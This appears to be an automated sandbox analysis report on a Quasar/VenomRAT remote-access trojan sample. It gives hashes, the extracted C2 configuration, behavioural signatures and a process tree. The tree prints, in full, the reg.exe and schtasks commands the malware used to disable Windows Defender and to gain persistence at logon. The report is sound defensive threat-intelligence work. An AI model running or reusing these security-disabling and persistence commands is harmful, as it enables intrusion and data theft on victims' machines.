quasar | 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6

Analysis

max time kernel
155s
max time network
183s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
10/03/2022, 18:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe
Size

9.4MB
MD5

456b54d87d22a2c59cb44ae3e29940a3
SHA1

4eb16df152f774f3794a6ca8c1cd1a3e72bc7232
SHA256

50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6
SHA512

8213a726aeee1519599e6884f6ad4564d5df066251267d630af4e601bef2b726a2445855e0a609f088c26c84b4cae69e26cc3d744668bf882ff46cb29684cc6d

Score

10^/10

quasar venomrat windows security notification evasion persistence pyinstaller rat rootkit spyware stealer trojan

Malware Config

Extracted

Family

quasar

Version

2.1.0.0

Botnet

Windows Security Notification

minecraftgaming009-61323.portmap.io:61323

Mutex

VNM_MUTEX_c2q7y2ayYutZ2XaYe7

Attributes

encryption_key
1oSvdU99XhcwnNYl3rB8
install_name
Windows Security Notification.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows Security Notification
subdirectory
SubDir

Signatures

Contains code to disable Windows Defender 6 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral2/files/0x0006000000022149-154.dat	disable_win_def
behavioral2/files/0x0006000000022149-159.dat	disable_win_def
behavioral2/memory/376-171-0x0000000000410000-0x00000000004A6000-memory.dmp	disable_win_def
behavioral2/files/0x0003000000000723-181.dat	disable_win_def
behavioral2/files/0x0003000000000723-182.dat	disable_win_def
behavioral2/files/0x0003000000000723-205.dat	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Quasar Payload 6 IoCs

resource	yara_rule
behavioral2/files/0x0006000000022149-154.dat	family_quasar
behavioral2/files/0x0006000000022149-159.dat	family_quasar
behavioral2/memory/376-171-0x0000000000410000-0x00000000004A6000-memory.dmp	family_quasar
behavioral2/files/0x0003000000000723-181.dat	family_quasar
behavioral2/files/0x0003000000000723-182.dat	family_quasar
behavioral2/files/0x0003000000000723-205.dat	family_quasar

Quasar RAT 3 IoCs

Quasar is an open source Remote Access Tool.

trojan spyware quasar

description	flow	ioc	Process
Key value queried		\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe
	32	ip-api.com	Process not Found
	66	api64.ipify.org	Process not Found

VenomRAT
VenomRAT is a modified version of QuasarRAT with some added features, such as rootkit and stealer capabilites.
rat rootkit stealer venomrat

Executes dropped EXE 10 IoCs

pid	Process
1948	Abxy.exe
2264	Abxy.exe
2248	Ygri.exe
3384	Eseycozeqlmrj.exe
3528	Ivyptgekvxzzxq.exe
376	Zutrnxofihoxqy.exe
4068	Steam.exe
916	Windows Security Notification.exe
3376	RtkBtManServ.exe
3924	Windows Security Notification.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	Ygri.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	Windows Security Notification.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager2680553.exe	Ygri.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager2680553.exe	Ygri.exe

Loads dropped DLL 6 IoCs

pid	Process
2264	Abxy.exe
2264	Abxy.exe
2264	Abxy.exe
2264	Abxy.exe
2264	Abxy.exe
2264	Abxy.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	Zutrnxofihoxqy.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	Zutrnxofihoxqy.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Notification = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Zutrnxofihoxqy.exe\""	Zutrnxofihoxqy.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Notification = "\"C:\\Windows\\SysWOW64\\SubDir\\Windows Security Notification.exe\""	Windows Security Notification.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
32	ip-api.com
66	api64.ipify.org

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\SubDir	Windows Security Notification.exe
File created	C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe	Zutrnxofihoxqy.exe
File opened for modification	C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe	Zutrnxofihoxqy.exe
File opened for modification	C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe	Windows Security Notification.exe

Detects Pyinstaller 3 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x000800000002212e-133.dat	pyinstaller
behavioral2/files/0x000800000002212e-134.dat	pyinstaller
behavioral2/files/0x000800000002212e-135.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2216	916	WerFault.exe	77
1656	3384	WerFault.exe	62

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2792	schtasks.exe
1228	schtasks.exe
1936	schtasks.exe
2628	schtasks.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings	Ygri.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2972	PING.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3384	Eseycozeqlmrj.exe
2472	powershell.exe
2472	powershell.exe
3924	Windows Security Notification.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	3528	Ivyptgekvxzzxq.exe
Token: SeDebugPrivilege	4068	Steam.exe
Token: SeDebugPrivilege	3384	Eseycozeqlmrj.exe
Token: SeDebugPrivilege	376	Zutrnxofihoxqy.exe
Token: SeDebugPrivilege	3376	RtkBtManServ.exe
Token: SeDebugPrivilege	916	Windows Security Notification.exe
Token: SeDebugPrivilege	916	Windows Security Notification.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	3924	Windows Security Notification.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
916	Windows Security Notification.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 540 wrote to memory of 1948	540	50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe	58
PID 540 wrote to memory of 1948	540	50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe	58
PID 1948 wrote to memory of 2264	1948	Abxy.exe	61
PID 1948 wrote to memory of 2264	1948	Abxy.exe	61
PID 540 wrote to memory of 2248	540	50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe	60
PID 540 wrote to memory of 2248	540	50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe	60
PID 540 wrote to memory of 2248	540	50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe	60
PID 540 wrote to memory of 3384	540	50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe	62
PID 540 wrote to memory of 3384	540	50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe	62
PID 540 wrote to memory of 3384	540	50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe	62
PID 540 wrote to memory of 3528	540	50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe	63
PID 540 wrote to memory of 3528	540	50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe	63
PID 540 wrote to memory of 376	540	50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe	64
PID 540 wrote to memory of 376	540	50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe	64
PID 540 wrote to memory of 376	540	50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe	64
PID 3528 wrote to memory of 2792	3528	Ivyptgekvxzzxq.exe	66
PID 3528 wrote to memory of 2792	3528	Ivyptgekvxzzxq.exe	66
PID 3528 wrote to memory of 4068	3528	Ivyptgekvxzzxq.exe	68
PID 3528 wrote to memory of 4068	3528	Ivyptgekvxzzxq.exe	68
PID 4068 wrote to memory of 1228	4068	Steam.exe	69
PID 4068 wrote to memory of 1228	4068	Steam.exe	69
PID 376 wrote to memory of 1936	376	Zutrnxofihoxqy.exe	75
PID 376 wrote to memory of 1936	376	Zutrnxofihoxqy.exe	75
PID 376 wrote to memory of 1936	376	Zutrnxofihoxqy.exe	75
PID 376 wrote to memory of 916	376	Zutrnxofihoxqy.exe	77
PID 376 wrote to memory of 916	376	Zutrnxofihoxqy.exe	77
PID 376 wrote to memory of 916	376	Zutrnxofihoxqy.exe	77
PID 376 wrote to memory of 2472	376	Zutrnxofihoxqy.exe	78
PID 376 wrote to memory of 2472	376	Zutrnxofihoxqy.exe	78
PID 376 wrote to memory of 2472	376	Zutrnxofihoxqy.exe	78
PID 2248 wrote to memory of 3376	2248	Ygri.exe	80
PID 2248 wrote to memory of 3376	2248	Ygri.exe	80
PID 2248 wrote to memory of 2976	2248	Ygri.exe	81
PID 2248 wrote to memory of 2976	2248	Ygri.exe	81
PID 2248 wrote to memory of 2976	2248	Ygri.exe	81
PID 916 wrote to memory of 2628	916	Windows Security Notification.exe	83
PID 916 wrote to memory of 2628	916	Windows Security Notification.exe	83
PID 916 wrote to memory of 2628	916	Windows Security Notification.exe	83
PID 2976 wrote to memory of 1516	2976	cmd.exe	85
PID 2976 wrote to memory of 1516	2976	cmd.exe	85
PID 2976 wrote to memory of 1516	2976	cmd.exe	85
PID 2976 wrote to memory of 3640	2976	cmd.exe	86
PID 2976 wrote to memory of 3640	2976	cmd.exe	86
PID 2976 wrote to memory of 3640	2976	cmd.exe	86
PID 2976 wrote to memory of 940	2976	cmd.exe	87
PID 2976 wrote to memory of 940	2976	cmd.exe	87
PID 2976 wrote to memory of 940	2976	cmd.exe	87
PID 2976 wrote to memory of 1760	2976	cmd.exe	88
PID 2976 wrote to memory of 1760	2976	cmd.exe	88
PID 2976 wrote to memory of 1760	2976	cmd.exe	88
PID 2976 wrote to memory of 3928	2976	cmd.exe	89
PID 2976 wrote to memory of 3928	2976	cmd.exe	89
PID 2976 wrote to memory of 3928	2976	cmd.exe	89
PID 2976 wrote to memory of 2464	2976	cmd.exe	90
PID 2976 wrote to memory of 2464	2976	cmd.exe	90
PID 2976 wrote to memory of 2464	2976	cmd.exe	90
PID 2976 wrote to memory of 2772	2976	cmd.exe	91
PID 2976 wrote to memory of 2772	2976	cmd.exe	91
PID 2976 wrote to memory of 2772	2976	cmd.exe	91
PID 2976 wrote to memory of 3556	2976	cmd.exe	93
PID 2976 wrote to memory of 3556	2976	cmd.exe	93
PID 2976 wrote to memory of 3556	2976	cmd.exe	93
PID 2976 wrote to memory of 3924	2976	cmd.exe	94
PID 2976 wrote to memory of 3924	2976	cmd.exe	94

C:\Users\Admin\AppData\Local\Temp\50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe
"C:\Users\Admin\AppData\Local\Temp\50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe"
1⤵
- Quasar RAT
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:540
- C:\Users\Admin\AppData\Local\Temp\Abxy.exe
  "C:\Users\Admin\AppData\Local\Temp\Abxy.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1948
- - C:\Users\Admin\AppData\Local\Temp\Abxy.exe
    "C:\Users\Admin\AppData\Local\Temp\Abxy.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2264
- C:\Users\Admin\AppData\Local\Temp\Ygri.exe
  "C:\Users\Admin\AppData\Local\Temp\Ygri.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Drops startup file
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2248
- - C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
    "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4EpeebWszwq3L5jgvisNmyvGbyVAfjjb/WhkVRHM1jSY9bDQBPQUlA+KOt+q65oQzJt9yxASNarn9KPWpl7VpeJNaoB2sh/pMWGpfd1hNghc5haR0kkZkRiX8yULrHRxs=
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3376
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2976
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:1516
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      PID:3640
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      PID:940
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      4⤵
      PID:1760
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      PID:3928
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      PID:2464
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      PID:2772
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      PID:3556
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      PID:3924
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      PID:3460
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤
      4⤵
      PID:1932
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      PID:2552
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      4⤵
      PID:3416
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:1128
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:3828
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      4⤵
      PID:3128
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:316
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:3952
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:64
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:2252
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      4⤵
      PID:244
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      4⤵
      PID:3796
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:3408
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:2924
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:3268
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:2448
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:204
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:3748
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:1640
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies security service
      PID:3812
- C:\Users\Admin\AppData\Local\Temp\Eseycozeqlmrj.exe
  "C:\Users\Admin\AppData\Local\Temp\Eseycozeqlmrj.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3384
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 1692
    3⤵
    - Program crash
    PID:1656
- C:\Users\Admin\AppData\Local\Temp\Ivyptgekvxzzxq.exe
  "C:\Users\Admin\AppData\Local\Temp\Ivyptgekvxzzxq.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3528
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Steam" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Ivyptgekvxzzxq.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:2792
- - C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe
    "C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4068
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Steam" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe" /rl HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:1228
- C:\Users\Admin\AppData\Local\Temp\Zutrnxofihoxqy.exe
  "C:\Users\Admin\AppData\Local\Temp\Zutrnxofihoxqy.exe"
  2⤵
  - Executes dropped EXE
  - Windows security modification
  - Adds Run key to start application
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:376
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /create /tn "Windows Security Notification" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Zutrnxofihoxqy.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:1936
- - C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe
    "C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Adds Run key to start application
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:916
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "Windows Security Notification" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe" /rl HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:2628
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iiMSmVvWlgy8.bat" "
      4⤵
      PID:3640
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:3372
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        5⤵
        Runs ping.exe
        
        PID:2972
    - - C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe
        
        "C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3924
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 2276
      4⤵
      Program crash
      PID:2216
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3384 -ip 3384
1⤵
PID:3936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 916 -ip 916
1⤵
PID:3272

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/376-162-0x0000000074B90000-0x0000000075340000-memory.dmp

Filesize
7.7MB

Download
memory/376-171-0x0000000000410000-0x00000000004A6000-memory.dmp

Filesize
600KB

Download
memory/376-172-0x00000000054A0000-0x0000000005A44000-memory.dmp

Filesize
5.6MB

Download
memory/376-177-0x0000000004EF0000-0x0000000005494000-memory.dmp

Filesize
5.6MB

Download
memory/376-180-0x00000000063B0000-0x00000000063EC000-memory.dmp

Filesize
240KB

Download
memory/376-175-0x0000000004EF0000-0x0000000004F82000-memory.dmp

Filesize
584KB

Download
memory/376-179-0x0000000005F90000-0x0000000005FA2000-memory.dmp

Filesize
72KB

Download
memory/540-132-0x0000000003AB0000-0x0000000003AB2000-memory.dmp

Filesize
8KB

Download
memory/540-131-0x00007FFC4F680000-0x00007FFC50141000-memory.dmp

Filesize
10.8MB

Download
memory/540-130-0x0000000000FE0000-0x0000000001958000-memory.dmp

Filesize
9.5MB

Download
memory/916-184-0x0000000005210000-0x00000000057B4000-memory.dmp

Filesize
5.6MB

Download
memory/916-183-0x0000000074B90000-0x0000000075340000-memory.dmp

Filesize
7.7MB

Download
memory/916-199-0x0000000006BA0000-0x0000000006BAA000-memory.dmp

Filesize
40KB

Download
memory/2248-170-0x0000000000290000-0x000000000058E000-memory.dmp

Filesize
3.0MB

Download
memory/2248-163-0x0000000074B90000-0x0000000075340000-memory.dmp

Filesize
7.7MB

Download
memory/2248-176-0x0000000005860000-0x00000000058C6000-memory.dmp

Filesize
408KB

Download
memory/2248-173-0x0000000000290000-0x000000000058E000-memory.dmp

Filesize
3.0MB

Download
memory/2248-174-0x0000000005590000-0x0000000005591000-memory.dmp

Filesize
4KB

Download
memory/2472-196-0x0000000006840000-0x0000000006841000-memory.dmp

Filesize
4KB

Download
memory/2472-195-0x0000000074B90000-0x0000000075340000-memory.dmp

Filesize
7.7MB

Download
memory/2472-210-0x0000000008100000-0x0000000008132000-memory.dmp

Filesize
200KB

Download
memory/2472-204-0x0000000006845000-0x0000000006847000-memory.dmp

Filesize
8KB

Download
memory/2472-203-0x0000000007BC0000-0x0000000007BDE000-memory.dmp

Filesize
120KB

Download
memory/2472-202-0x0000000007620000-0x0000000007686000-memory.dmp

Filesize
408KB

Download
memory/2472-190-0x0000000004120000-0x0000000004156000-memory.dmp

Filesize
216KB

Download
memory/2472-201-0x0000000006D40000-0x0000000006D62000-memory.dmp

Filesize
136KB

Download
memory/2472-211-0x000000007F8F0000-0x000000007F8F1000-memory.dmp

Filesize
4KB

Download
memory/2472-192-0x0000000006842000-0x0000000006843000-memory.dmp

Filesize
4KB

Download
memory/2472-212-0x00000000708F0000-0x000000007093C000-memory.dmp

Filesize
304KB

Download
memory/2472-198-0x0000000006E80000-0x00000000074A8000-memory.dmp

Filesize
6.2MB

Download
memory/2472-213-0x0000000007F80000-0x0000000007F9E000-memory.dmp

Filesize
120KB

Download
memory/3376-208-0x000001E57C520000-0x000001E57C542000-memory.dmp

Filesize
136KB

Download
memory/3376-194-0x000001E57E370000-0x000001E57E3E6000-memory.dmp

Filesize
472KB

Download
memory/3376-193-0x000001E57E4A0000-0x000001E57E4A2000-memory.dmp

Filesize
8KB

Download
memory/3376-191-0x00007FFC4F680000-0x00007FFC50141000-memory.dmp

Filesize
10.8MB

Download
memory/3376-187-0x000001E57A5F0000-0x000001E57A8CA000-memory.dmp

Filesize
2.9MB

Download
memory/3376-214-0x000001E57E4B0000-0x000001E57E4CA000-memory.dmp

Filesize
104KB

Download
memory/3384-178-0x0000000005720000-0x0000000005721000-memory.dmp

Filesize
4KB

Download
memory/3384-169-0x0000000000B80000-0x0000000000B88000-memory.dmp

Filesize
32KB

Download
memory/3384-164-0x0000000074B90000-0x0000000075340000-memory.dmp

Filesize
7.7MB

Download
memory/3528-160-0x000000001CE70000-0x000000001CE82000-memory.dmp

Filesize
72KB

Download
memory/3528-150-0x0000000000580000-0x00000000005A4000-memory.dmp

Filesize
144KB

Download
memory/3528-153-0x00007FFC4F680000-0x00007FFC50141000-memory.dmp

Filesize
10.8MB

Download
memory/3528-156-0x0000000000BD0000-0x0000000000BD2000-memory.dmp

Filesize
8KB

Download
memory/3528-161-0x000000001D210000-0x000000001D24C000-memory.dmp

Filesize
240KB

Download
memory/3924-206-0x0000000074B90000-0x0000000075340000-memory.dmp

Filesize
7.7MB

Download
memory/3924-209-0x0000000004D60000-0x0000000005304000-memory.dmp

Filesize
5.6MB

Download
